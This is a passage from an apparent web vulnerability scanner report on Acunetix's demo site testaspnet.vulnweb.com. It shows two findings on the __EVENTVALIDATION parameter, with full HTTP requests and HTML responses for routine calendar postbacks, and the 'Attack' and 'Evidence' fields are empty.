by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8214&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgDA%2BiSZWNoIZGRkO1qj7DILkXbnhDgg0x2ChIGDVtM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLx57bqBQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8jUpGSzJ2i2%2Fy%2Fkddmcp0KLvTs3g%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:47:09 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgDA+iSZWNoIZGRkO1qj7DILkXbnhDgg0x2ChIGDVtM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLx57bqBQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8jUpGSzJ2i2/y/kddmcp0KLvTs3g==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:White" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8254&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgDAgMUHeNoIZGRkf4syimstv4Hy%2FQCtHppQ%2BGGSEuM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLX6IuRCgKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DCXHHHe5sL3skgKHw7HpM2S2CLNA%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:57:44 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgDAgMUHeNoIZGRkf4syimstv4Hy/QCtHppQ+GGSEuM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLX6IuRCgKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DCXHHHe5sL3skgKHw7HpM2S2CLNA=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:White" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their 